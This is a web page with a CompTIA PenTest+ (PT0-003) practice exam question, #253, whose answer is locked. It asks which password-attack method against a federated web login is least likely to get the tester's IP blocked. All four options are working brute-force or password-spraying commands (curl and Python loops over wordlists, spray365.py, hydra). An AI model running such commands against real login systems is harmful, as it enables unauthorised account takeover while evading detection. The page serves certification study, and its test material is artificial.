CompTIACompTIA
PT0-003 · Question #253
PT0-003 Question #253: Real Exam Question with Answer & Explanation
Sign in or unlock PT0-003 to reveal the answer and full explanation for question #253. The question stem and answer options stay visible for context.
Submitted by haruto_sh· Mar 6, 2026Attacks & Exploits - Performing password attacks against authentication systems while evading detection (maps to CompTIA PenTest+ Domain 3: Attacks & Exploits / Domain 4: Reporting & Communication regarding tool selection)
Question
A penetration tester is evaluating the security of a corporate client's web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester's machine? A. B. C. D.
Options
- Afor user in $(cat users.txt); do for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -X POST https://example.com/login.asp -d"username=$user\&password=$pass" |grep "Welcome" && echo "OK! $user $pass" done; done
- Bspray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --connection_plan target.plan spray365.py spray target.plan
- Cimport requests,pathlib users=pathlib.Path("users.txt").read_text() ; passwords=pathlib.Path("passwords.txt").read_text() for user in users: for pass in passwords: r=requests.post(f"https://example.com",data=f"username={user}&password={pass}",headers={"user-agent":"Mozilla/4.0"}) if "Welcome" in r.text: print(f"OK: {user} {pass}")
- Dhydra -l users.txt -P /usr/share/wordlists/rockyou.txt <domain_ip> http-post-form "/login.asp:username=^USER^&password=^PASS^:Invalid Password"
Unlock PT0-003 to see the answer
You've previewed enough free PT0-003 questions. Unlock PT0-003 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#Password Spraying#Federated Authentication#Evasion Techniques#Web Application Penetration Testing